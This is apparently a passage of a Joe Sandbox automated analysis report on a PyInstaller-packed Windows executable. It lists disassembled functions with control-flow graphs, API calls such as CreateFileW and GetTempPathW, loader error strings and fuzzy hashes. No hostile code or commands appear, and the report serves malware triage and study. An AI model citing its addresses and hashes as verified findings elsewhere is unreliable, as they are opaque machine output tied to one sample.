7ff652ed3bdb-7ff652ed3be8 call 7ff652ed6ff0 114->120 134 7ff652ed3b53 115->134 135 7ff652ed3b85-7ff652ed3b88 call 7ff652ed14e0 115->135 117->81 118->106 126 7ff652ed3abc-7ff652ed3ad3 call 7ff652ed4060 118->126 119->113 119->120 136 7ff652ed3c33-7ff652ed3c38 call 7ff652ed6f70 120->136 137 7ff652ed3bea-7ff652ed3bf7 call 7ff652ed6ca0 120->137 145 7ff652ed3ad5-7ff652ed3ad8 126->145 146 7ff652ed3ada-7ff652ed3b06 call 7ff652ed84c0 126->146 140 7ff652ed3b5a call 7ff652ed2b10 132->140 133->120 134->140 144 7ff652ed3b8d-7ff652ed3b90 135->144 149 7ff652ed3c3d-7ff652ed3c40 136->149 137->136 154 7ff652ed3bf9-7ff652ed3c08 call 7ff652ed6800 137->154 140->81 144->81 144->109 147 7ff652ed3b15-7ff652ed3b2b call 7ff652ed2b10 145->147 146->106 156 7ff652ed3b08-7ff652ed3b10 call 7ff652ee097c 146->156 147->81 152 7ff652ed3d11-7ff652ed3d20 call 7ff652ed34a0 149->152 153 7ff652ed3c46-7ff652ed3c50 149->153 152->81 171 7ff652ed3d26-7ff652ed3d55 call 7ff652ed8b50 call 7ff652ed81e0 call 7ff652ed7d70 call 7ff652ed3600 152->171 157 7ff652ed3c53-7ff652ed3c5d 153->157 169 7ff652ed3c0a-7ff652ed3c16 call 7ff652ed6780 154->169 170 7ff652ed3c29-7ff652ed3c2e call 7ff652ed6a50 154->170 156->147 162 7ff652ed3c5f-7ff652ed3c64 157->162 163 7ff652ed3c66-7ff652ed3c68 157->163 162->157 162->163 167 7ff652ed3cb1-7ff652ed3cb7 163->167 168 7ff652ed3c6a-7ff652ed3c8d call 7ff652ed1ee0 163->168 175 7ff652ed3cdc-7ff652ed3d0c call 7ff652ed3600 call 7ff652ed3440 call 7ff652ed35f0 call 7ff652ed6a50 call 7ff652ed6f70 167->175 176 7ff652ed3cb9-7ff652ed3cd6 PostMessageW GetMessageW 167->176 168->81 184 7ff652ed3c93-7ff652ed3c9d 168->184 169->170 185 7ff652ed3c18-7ff652ed3c27 call 7ff652ed6e40 169->185 170->136 199 7ff652ed3d7a-7ff652ed3daa call 7ff652ed8290 call 7ff652ed6a50 call 7ff652ed6f70 171->199 200 7ff652ed3d57-7ff652ed3d74 PostMessageW GetMessageW 171->200 175->83 176->175 188 7ff652ed3ca0-7ff652ed3caf 184->188 185->149 188->167 188->188 210 7ff652ed3dac-7ff652ed3db3 call 7ff652ed7f50 199->210 211 7ff652ed3db8-7ff652ed3dbb call 7ff652ed1e70 199->211 200->199 210->211 214 7ff652ed3dc0-7ff652ed3dc2 211->214 214->83
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$EnvironmentPost$DirectoryExpandFileModuleNameStringsVariable
                                                    • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                    • API String ID: 2647325126-1544818733
                                                    • Opcode ID: 7e818fdf10d144ebf1a2c27805d4b093fd68b8386923d87f4e33e82801278a2a
                                                    • Instruction ID: 30eb35b29fe95acb9b4af5a3f1753b8972b06d32ed22afa375d05d3310b9ddf2
                                                    • Opcode Fuzzy Hash: 7e818fdf10d144ebf1a2c27805d4b093fd68b8386923d87f4e33e82801278a2a
                                                    • Instruction Fuzzy Hash: 9DC19422B0C66741EB29EB21AC512BD6351BFC578CF48113DEA4DE7696DFACE9058B00
                                                    Function 00007FF652EF6B50 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 263 7ff652ef6b50-7ff652ef6b8b call 7ff652ef64d8 call 7ff652ef64e0 call 7ff652ef6548 270 7ff652ef6db5-7ff652ef6e01 call 7ff652eeb6b8 call 7ff652ef64d8 call 7ff652ef64e0 call 7ff652ef6548 263->270 271 7ff652ef6b91-7ff652ef6b9c call 7ff652ef64e8 263->271 297 7ff652ef6f3f-7ff652ef6fad call 7ff652eeb6b8 call 7ff652ef23d0 270->297 298 7ff652ef6e07-7ff652ef6e12 call 7ff652ef64e8 270->298 271->270 276 7ff652ef6ba2-7ff652ef6bac 271->276 278 7ff652ef6bce-7ff652ef6bd2 276->278 279 7ff652ef6bae-7ff652ef6bb1 276->279 282 7ff652ef6bd5-7ff652ef6bdd 278->282 281 7ff652ef6bb4-7ff652ef6bbf 279->281 284 7ff652ef6bc1-7ff652ef6bc8 281->284 285 7ff652ef6bca-7ff652ef6bcc 281->285 282->282 286 7ff652ef6bdf-7ff652ef6bf2 call 7ff652eee3ac 282->286 284->281 284->285 285->278 288 7ff652ef6bfb-7ff652ef6c09 285->288 293 7ff652ef6bf4-7ff652ef6bf6 call 7ff652eeb700 286->293 294 7ff652ef6c0a-7ff652ef6c16 call 7ff652eeb700 286->294 293->288 303 7ff652ef6c1d-7ff652ef6c25 294->303 317 7ff652ef6faf-7ff652ef6fb6 297->317 318 7ff652ef6fbb-7ff652ef6fbe 297->318 298->297 306 7ff652ef6e18-7ff652ef6e23 call 7ff652ef6518 298->306 303->303 307 7ff652ef6c27-7ff652ef6c38 call 7ff652ef1344 303->307 306->297 315 7ff652ef6e29-7ff652ef6e4c call 7ff652eeb700 GetTimeZoneInformation 306->315 307->270 316 7ff652ef6c3e-7ff652ef6c94 call 7ff652efb580 * 4 call 7ff652ef6a6c 307->316 329 7ff652ef6f14-7ff652ef6f3e call 7ff652ef64d0 call 7ff652ef64c0 call 7ff652ef64c8 315->329 330 7ff652ef6e52-7ff652ef6e73 315->330 375 7ff652ef6c96-7ff652ef6c9a 316->375 323 7ff652ef704b-7ff652ef704e 317->323 320 7ff652ef6ff5-7ff652ef7008 call 7ff652eee3ac 318->320 321 7ff652ef6fc0 318->321 336 7ff652ef7013-7ff652ef702e call 7ff652ef23d0 320->336 337 7ff652ef700a 320->337 325 7ff652ef6fc3 321->325 323->325 328 7ff652ef7054-7ff652ef705c call 7ff652ef6b50 323->328 331 7ff652ef6fc8-7ff652ef6ff4 call 7ff652eeb700 call 7ff652edc010 325->331 332 7ff652ef6fc3 call 7ff652ef6dcc 325->332 328->331 339 7ff652ef6e75-7ff652ef6e7b 330->339 340 7ff652ef6e7e-7ff652ef6e85 330->340 332->331 359 7ff652ef7035-7ff652ef7047 call 7ff652eeb700 336->359 360 7ff652ef7030-7ff652ef7033 336->360 344 7ff652ef700c-7ff652ef7011 call 7ff652eeb700 337->344 339->340 346 7ff652ef6e99 340->346 347 7ff652ef6e87-7ff652ef6e8f 340->347 344->321 356 7ff652ef6e9b-7ff652ef6f0f call 7ff652efb580 * 4 call 7ff652ef39ac call 7ff652ef7064 * 2 346->356 347->346 353 7ff652ef6e91-7ff652ef6e97 347->353 353->356 356->329 359->323 360->344 377 7ff652ef6ca0-7ff652ef6ca4 375->377 378 7ff652ef6c9c 375->378 377->375 380 7ff652ef6ca6-7ff652ef6ccb call 7ff652ee75a8 377->380 378->377 386 7ff652ef6cce-7ff652ef6cd2 380->386 388 7ff652ef6cd4-7ff652ef6cdf 386->388 389 7ff652ef6ce1-7ff652ef6ce5 386->389 388->389 391 7ff652ef6ce7-7ff652ef6ceb 388->391 389->386 394 7ff652ef6d6c-7ff652ef6d70 391->394 395 7ff652ef6ced-7ff652ef6d15 call 7ff652ee75a8 391->395 396 7ff652ef6d72-7ff652ef6d74 394->396 397 7ff652ef6d77-7ff652ef6d84 394->397 403 7ff652ef6d33-7ff652ef6d37 395->403 404 7ff652ef6d17 395->404 396->397 399 7ff652ef6d9f-7ff652ef6dae call 7ff652ef64d0 call 7ff652ef64c0 397->399 400 7ff652ef6d86-7ff652ef6d9c call 7ff652ef6a6c 397->400 399->270 400->399 403->394 406 7ff652ef6d39-7ff652ef6d57 call 7ff652ee75a8 403->406 408 7ff652ef6d1a-7ff652ef6d21 404->408 415 7ff652ef6d63-7ff652ef6d6a 406->415 408->403 412 7ff652ef6d23-7ff652ef6d31 408->412 412->403 412->408 415->394 416 7ff652ef6d59-7ff652ef6d5d 415->416 416->394 417 7ff652ef6d5f 416->417 417->415
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6B95
                                                      • Part of subcall function 00007FF652EF64E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF64FC
                                                      • Part of subcall function 00007FF652EEB700: RtlFreeHeap.NTDLL(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB716
                                                      • Part of subcall function 00007FF652EEB700: GetLastError.KERNEL32(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB720
                                                      • Part of subcall function 00007FF652EEB6B8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF652EEB697,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEB6C1
                                                      • Part of subcall function 00007FF652EEB6B8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF652EEB697,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEB6E6
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6B84
                                                      • Part of subcall function 00007FF652EF6548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF655C
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6DFA
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6E0B
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6E1C
                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF652EF705C), ref: 00007FF652EF6E43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                    • API String ID: 4070488512-239921721
                                                    • Opcode ID: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
                                                    • Instruction ID: 202c4161804df161e493aad559183d23e40ad0e64538e36a9cff3fab8070847a
                                                    • Opcode Fuzzy Hash: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
                                                    • Instruction Fuzzy Hash: E0D1D362A0826286EB24AF22FC511BA7361FF4579CF48413DEA5DE7A95DFBCE441C340
                                                    Function 00007FF652EF7A9C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 448 7ff652ef7a9c-7ff652ef7b0f call 7ff652ef77d0 451 7ff652ef7b11-7ff652ef7b1a call 7ff652ee5c94 448->451 452 7ff652ef7b29-7ff652ef7b33 call 7ff652ee8c58 448->452 457 7ff652ef7b1d-7ff652ef7b24 call 7ff652ee5cb4 451->457 458 7ff652ef7b35-7ff652ef7b4c call 7ff652ee5c94 call 7ff652ee5cb4 452->458 459 7ff652ef7b4e-7ff652ef7bb7 CreateFileW 452->459 472 7ff652ef7e6a-7ff652ef7e8a 457->472 458->457 460 7ff652ef7c34-7ff652ef7c3f GetFileType 459->460 461 7ff652ef7bb9-7ff652ef7bbf 459->461 467 7ff652ef7c92-7ff652ef7c99 460->467 468 7ff652ef7c41-7ff652ef7c7c GetLastError call 7ff652ee5c28 CloseHandle 460->468 464 7ff652ef7c01-7ff652ef7c2f GetLastError call 7ff652ee5c28 461->464 465 7ff652ef7bc1-7ff652ef7bc5 461->465 464->457 465->464 470 7ff652ef7bc7-7ff652ef7bff CreateFileW 465->470 475 7ff652ef7ca1-7ff652ef7ca4 467->475 476 7ff652ef7c9b-7ff652ef7c9f 467->476 468->457 483 7ff652ef7c82-7ff652ef7c8d call 7ff652ee5cb4 468->483 470->460 470->464 477 7ff652ef7caa-7ff652ef7cff call 7ff652ee8b70 475->477 478 7ff652ef7ca6 475->478 476->477 486 7ff652ef7d01-7ff652ef7d0d call 7ff652ef79d8 477->486 487 7ff652ef7d1e-7ff652ef7d4f call 7ff652ef7550 477->487 478->477 483->457 486->487 493 7ff652ef7d0f 486->493 494 7ff652ef7d55-7ff652ef7d97 487->494 495 7ff652ef7d51-7ff652ef7d53 487->495 498 7ff652ef7d11-7ff652ef7d19 call 7ff652eeb878 493->498 496 7ff652ef7db9-7ff652ef7dc4 494->496 497 7ff652ef7d99-7ff652ef7d9d 494->497 495->498 500 7ff652ef7dca-7ff652ef7dce 496->500 501 7ff652ef7e68 496->501 497->496 499 7ff652ef7d9f-7ff652ef7db4 497->499 498->472 499->496 500->501 503 7ff652ef7dd4-7ff652ef7e19 CloseHandle CreateFileW 500->503 501->472 505 7ff652ef7e4e-7ff652ef7e63 503->505 506 7ff652ef7e1b-7ff652ef7e49 GetLastError call 7ff652ee5c28 call 7ff652ee8d98 503->506 505->501 506->505
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                    • String ID:
                                                    • API String ID: 1617910340-0
                                                    • Opcode ID: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                    • Instruction ID: 3d0ac4637c27dae2a3fb30f06939d0707fdee7fd11ed1f445748475436735d20
                                                    • Opcode Fuzzy Hash: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                    • Instruction Fuzzy Hash: 27C1DF37B28A5285EB10CF64D8906BD3761EB49B9CF181239DA2EAB7D4DF78D456C300
                                                    Function 00007FF652ED7B60 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF652ED153F), ref: 00007FF652ED7BF7
                                                      • Part of subcall function 00007FF652ED7D70: GetEnvironmentVariableW.KERNEL32(00007FF652ED39FF), ref: 00007FF652ED7DAA
                                                      • Part of subcall function 00007FF652ED7D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF652ED7DC7
                                                      • Part of subcall function 00007FF652EE8610: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EE8629
                                                    • SetEnvironmentVariableW.KERNEL32 ref: 00007FF652ED7CB1
                                                      • Part of subcall function 00007FF652ED2B10: MessageBoxW.USER32 ref: 00007FF652ED2BE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                    • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                    • API String ID: 3752271684-1116378104
                                                    • Opcode ID: 8ca8b3c2351723dac4712d3aa85941f8869fc0faa47b2209596cb44ab2a1f07c
                                                    • Instruction ID: f1599c03a14ea12c6bc8bcc6ff900306f20bc79c6891fd3a42c778eecbfdb23d
                                                    • Opcode Fuzzy Hash: 8ca8b3c2351723dac4712d3aa85941f8869fc0faa47b2209596cb44ab2a1f07c
                                                    • Instruction Fuzzy Hash: FD514C11B0967345FF65A722AD162BA52416FCABC8F4C543DED0EEB7D7EDACE4028240
                                                    Function 00007FF652EDA76D Relevance: 12.0, Strings: 9, Instructions: 745COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                    • API String ID: 0-2665694366
                                                    • Opcode ID: 63f3ffa9379e1e3dea1ad36e367ec88dcfea323b25a29ef61fa4fbcfb838a92b
                                                    • Instruction ID: 1d97d6dea635e32bd889a9ca5b35b1bd72317f5c69dee174aa75be7505b325a3
                                                    • Opcode Fuzzy Hash: 63f3ffa9379e1e3dea1ad36e367ec88dcfea323b25a29ef61fa4fbcfb838a92b
                                                    • Instruction Fuzzy Hash: A652E672A146B68BD7648F14D858B7E3BA9FB84344F09413DEA4A97780DFBCE944CB40
                                                    Function 00007FF652EF6DCC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 957 7ff652ef6dcc-7ff652ef6e01 call 7ff652ef64d8 call 7ff652ef64e0 call 7ff652ef6548 964 7ff652ef6f3f-7ff652ef6fad call 7ff652eeb6b8 call 7ff652ef23d0 957->964 965 7ff652ef6e07-7ff652ef6e12 call 7ff652ef64e8 957->965 977 7ff652ef6faf-7ff652ef6fb6 964->977 978 7ff652ef6fbb-7ff652ef6fbe 964->978 965->964 970 7ff652ef6e18-7ff652ef6e23 call 7ff652ef6518 965->970 970->964 976 7ff652ef6e29-7ff652ef6e4c call 7ff652eeb700 GetTimeZoneInformation 970->976 987 7ff652ef6f14-7ff652ef6f3e call 7ff652ef64d0 call 7ff652ef64c0 call 7ff652ef64c8 976->987 988 7ff652ef6e52-7ff652ef6e73 976->988 982 7ff652ef704b-7ff652ef704e 977->982 980 7ff652ef6ff5-7ff652ef7008 call 7ff652eee3ac 978->980 981 7ff652ef6fc0 978->981 993 7ff652ef7013-7ff652ef702e call 7ff652ef23d0 980->993 994 7ff652ef700a 980->994 984 7ff652ef6fc3 981->984 982->984 986 7ff652ef7054-7ff652ef705c call 7ff652ef6b50 982->986 989 7ff652ef6fc8-7ff652ef6ff4 call 7ff652eeb700 call 7ff652edc010 984->989 990 7ff652ef6fc3 call 7ff652ef6dcc 984->990 986->989 996 7ff652ef6e75-7ff652ef6e7b 988->996 997 7ff652ef6e7e-7ff652ef6e85 988->997 990->989 1013 7ff652ef7035-7ff652ef7047 call 7ff652eeb700 993->1013 1014 7ff652ef7030-7ff652ef7033 993->1014 1000 7ff652ef700c-7ff652ef7011 call 7ff652eeb700 994->1000 996->997 1002 7ff652ef6e99 997->1002 1003 7ff652ef6e87-7ff652ef6e8f 997->1003 1000->981 1010 7ff652ef6e9b-7ff652ef6f0f call 7ff652efb580 * 4 call 7ff652ef39ac call 7ff652ef7064 * 2 1002->1010 1003->1002 1008 7ff652ef6e91-7ff652ef6e97 1003->1008 1008->1010 1010->987 1013->982 1014->1000
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6DFA
                                                      • Part of subcall function 00007FF652EF6548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF655C
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6E0B
                                                      • Part of subcall function 00007FF652EF64E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF64FC
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6E1C
                                                      • Part of subcall function 00007FF652EF6518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF652C
                                                      • Part of subcall function 00007FF652EEB700: RtlFreeHeap.NTDLL(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB716
                                                      • Part of subcall function 00007FF652EEB700: GetLastError.KERNEL32(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB720
                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF652EF705C), ref: 00007FF652EF6E43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                    • API String ID: 3458911817-239921721
                                                    • Opcode ID: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
                                                    • Instruction ID: 961632fb4ccff5c28fe2fdae0b72c08df49d6af367f705c0a9351a79c4a25899
                                                    • Opcode Fuzzy Hash: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
                                                    • Instruction Fuzzy Hash: 9551B372A1866286E710DF22FC811AA7760FF4978CF88413DEA5DE3A95DFBCE5408740
                                                    Function 00007FF652ED9F3B Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $header crc mismatch$unknown header flags set
                                                    • API String ID: 0-1127688429
                                                    • Opcode ID: a8b055446104684f1ad95e328151202d31fdc591d47a14639da6131c49358b20
                                                    • Instruction ID: 85752a47fe1dedda91bb88f474a1605c57328ddb666958fbb7e0e8f764d482a7
                                                    • Opcode Fuzzy Hash: a8b055446104684f1ad95e328151202d31fdc591d47a14639da6131c49358b20
                                                    • Instruction Fuzzy Hash: 1EF174726183E54BE7A58B15C889B3E3AA9EF84748F1D453CDA4DA7790CFB8E640C740
                                                    Function 00007FF652ED8D00 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                    • Instruction ID: 638f960447cb12f4dc83968e8cbcbca38eb1bab3a3dc2ffddb770f6a11c25b3e
                                                    • Opcode Fuzzy Hash: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                    • Instruction Fuzzy Hash: C1F0A432A1868586F7A0CF60F8897667360FB9476CF08073ED66D666D4DFBCD0198B00
                                                    Function 00007FF652ED9D9B Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
